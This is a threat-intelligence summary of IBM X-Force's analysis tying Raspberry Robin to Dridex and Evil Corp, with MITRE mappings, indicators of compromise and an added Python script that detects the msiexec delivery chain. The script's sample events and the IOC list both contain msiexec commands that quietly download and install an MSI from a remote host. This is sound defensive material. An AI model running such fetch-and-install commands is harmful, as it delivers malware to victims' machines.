Raspberry Robin and Dridex: Two Birds of a Feather

IBM X-Force/MDR analysis connects Raspberry Robin infections with the Dridex malware and the Russia-based Evil Corp, revealing shared loader structures, anti-analysis techniques, and a workflow that leverages USB-based initial access. The report traces the infection chain from a malicious LNK on USB through msiexec to download and execute an MSI, then loads Raspberry Robin payloads that resemble Dridex, suggesting Evil Corp’s use of Raspberry Robin infrastructure for its attacks. #RaspberryRobin #Dridex #EvilCorp #FAKEUPDATES #SocGholish #QNAP

Keypoints

  • IBM X-Force/MDR links Raspberry Robin infections to Evil Corp by comparing Raspberry Robin loaders with Dridex loaders, noting very similar structure and functionality.
  • Initial access is typically via USB with a malicious .LNK file that uses msiexec to download and execute an MSI from a C2 domain.
  • The malware uses living-off-the-land binaries (LOLBins) such as rundll32.exe, fodhelper.exe, regsvr32.exe, dllhost.exe, and odbcconf.exe to load and run the payload.
  • Two Raspberry Robin loader variants show complex decryption, anti-analysis, and hook-detection techniques to evade security software.
  • X-Force’s comparative analysis finds strong similarities between Raspberry Robin loaders and Dridex loaders, including string decoding and payload decoding approaches.
  • Recommendations emphasize security awareness, IOC searches, EDR deployment, USB device controls, and disabling AutoRun to mitigate Raspberry Robin.

MITRE Techniques

  • [T1091] Replication Through Removable Media – Raspberry Robin is delivered by a USB device containing a malicious .LNK file, leading to execution. Bracketed quote: “…delivered by a USB device, which contains a malicious Microsoft shortcut (.LNK) file.”
  • [T1105] Ingress Tool Transfer – The MSI installer is downloaded and executed from a C2 domain. Bracketed quote: “to download and execute an MSI installer from a command and control (C2) domain.”
  • [T1218] Signed Binary Proxy Execution – Msiexec is used to download and execute the MSI, and LOLBins are used to load the payload. Bracketed quote: “spawns a malicious command referencing msiexec.exe, a legitimate Windows system utility” and “utilizes other legitimate Windows system utilities and tools, known as living-off-the-land binaries (LOLBin) such as rundll32.exe, fodhelper.exe, regsvr32.exe, dllhost.exe, and odbcconf.exe…”
  • [T1027] Obfuscated/Compressed Files and Information – The loaders decode strings at runtime and operate with highly obfuscated payloads. Bracketed quote: “decodes strings at runtime and then decodes a highly obfuscated DLL whose purpose has not been determined.”
  • [T1055] Process Injection – The final payload is copied into the process space of the original loader and executed. Bracketed quote: “The intermediate loader copies the final payload to the process space of the original loader, Raspberry Robin Loader variant 2 and then executes it.”
  • [T1562] Impair Defenses – Anti-analysis techniques in the loaders detect security software via hook-detection in LdrLoadDll and other checks. Bracketed quote: “antianalysis technique… detects hooks in the function LdrLoadDll()”
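The delivery chain summarized in the keypoints and in the T1091/T1105/T1218 entries above (msiexec fetching an MSI from a remote host on a non-standard port, followed by a LOLBin spawned from that msiexec process) is straightforward to turn into process-creation detection logic. The following is an added example for defenders, not code from the IBM X-Force report; the event format (parent image, child image, command line), the hostname `c2-placeholder.invalid`, and the sample events are all constructed. Note that the command line in the IOC section uses mixed case (`msieXeC`, `/I`, `coMpUTErname`), so every match below is case-insensitive.

```python
"""Detection logic for the Raspberry Robin msiexec/LOLBin delivery chain.

Added example, not the report's own code. The event tuple layout and the
sample events are constructed; real Sysmon/EDR fields will differ.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Constructed sample process-creation events: (parent image, child image, command line).
SAMPLE_EVENTS: List[Tuple[str, str, str]] = [
    # Mixed-case msiexec pulling an MSI over HTTP on 8080, launched from explorer (LNK on USB).
    ("explorer.exe", "msiexec.exe",
     'msieXeC /q /I "http://c2-placeholder.invalid:8080/rAnDoM/coMpUTErname=WS01"'),
    # Benign quiet install of a local MSI: no URL, should not alert.
    ("services.exe", "msiexec.exe",
     'msiexec.exe /i "C:\\Users\\alice\\Downloads\\tool-installer.msi" /qn'),
    # LOLBin spawned directly by msiexec: the next stage of the chain.
    ("msiexec.exe", "rundll32.exe", 'rundll32.exe C:\\ProgramData\\stage.dll,DllMain'),
    # LOLBins with ordinary parents: not enough on their own.
    ("cmd.exe", "odbcconf.exe", 'odbcconf.exe /a {REGSVR C:\\temp\\x.dll}'),
    ("svchost.exe", "dllhost.exe",
     'dllhost.exe /Processid:{00000000-0000-0000-0000-000000000000}'),
]

# LOLBins named in the report as used to load the payload.
LOLBINS = {"rundll32.exe", "fodhelper.exe", "regsvr32.exe", "dllhost.exe", "odbcconf.exe"}
STANDARD_PORTS = {80, 443}

URL_RE = re.compile(r'https?://([^\s/:"\']+)(?::(\d+))?', re.IGNORECASE)
# Accept "/i" or "-i" in any case; the IOC shows "/I".
INSTALL_SWITCH_RE = re.compile(r'(?:^|\s)[/-]i(?:\s|$)', re.IGNORECASE)
QUIET_SWITCH_RE = re.compile(r'(?:^|\s)[/-]q[nb]?(?:\s|$)', re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    severity: str
    detail: str


def inspect_event(parent: str, image: str, cmdline: str) -> Optional[Finding]:
    """Return a Finding for one process-creation event, or None if it is uninteresting."""
    image_l, parent_l = image.lower(), parent.lower()

    if image_l == "msiexec.exe":
        url = URL_RE.search(cmdline)
        if not (url and INSTALL_SWITCH_RE.search(cmdline)):
            return None  # local install or no install switch
        host, port = url.group(1), url.group(2)
        port_n = int(port) if port else (443 if url.group(0).lower().startswith("https") else 80)
        # Non-standard port, explorer parent (shortcut launch) or hostname in the URL all
        # match the reported chain; any one of them raises severity.
        suspicious = (port_n not in STANDARD_PORTS
                      or parent_l == "explorer.exe"
                      or "computername=" in cmdline.lower())
        quiet = " quiet" if QUIET_SWITCH_RE.search(cmdline) else ""
        return Finding("msiexec_remote_install", "high" if suspicious else "medium",
                       f"msiexec{quiet} install from {host}:{port_n}, parent={parent}")

    if image_l in LOLBINS and parent_l == "msiexec.exe":
        return Finding("lolbin_spawned_by_msiexec", "high",
                       f"{image} spawned by msiexec: {cmdline}")
    return None


def scan(events: Iterable[Tuple[str, str, str]]) -> List[Finding]:
    """Run inspect_event over every event and keep the hits."""
    return [f for f in (inspect_event(*e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.severity}] {finding.rule}: {finding.detail}")
```

Against the constructed events this yields two findings: the mixed-case remote install on port 8080 and the rundll32 child of msiexec. The benign local MSI install and the LOLBins with ordinary parents are not flagged, which is the intended precision: the signal is msiexec with a URL install source, or a LOLBin whose parent is msiexec, not LOLBin execution in general.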

Indicators of Compromise

  • [File hashes] context – Raspberry Robin Loader Variant 1: c0a13af59e578b77e82fe0bc87301f93fc2ccf0adce450087121cb32f218092c
  • [File hashes] context – Dridex Loader: b30b76585ea225bdf8b4c6eedf4e6e99aff0cf8aac7cdf6fb1fa58b8bde68ab3
  • [File hashes] context – Raspberry Robin Loader Variant 2: 1a5fcb209b5af4c620453a70653263109716f277150f0d389810df85ec0beac1
  • [Command line] context – msieXeC /q /I “S8 [.]Cx:8080/random string/coMpUTErname=USER”
  • [Port] context – 8080 – non-standard HTTP port used in the payload delivery

Read more: https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/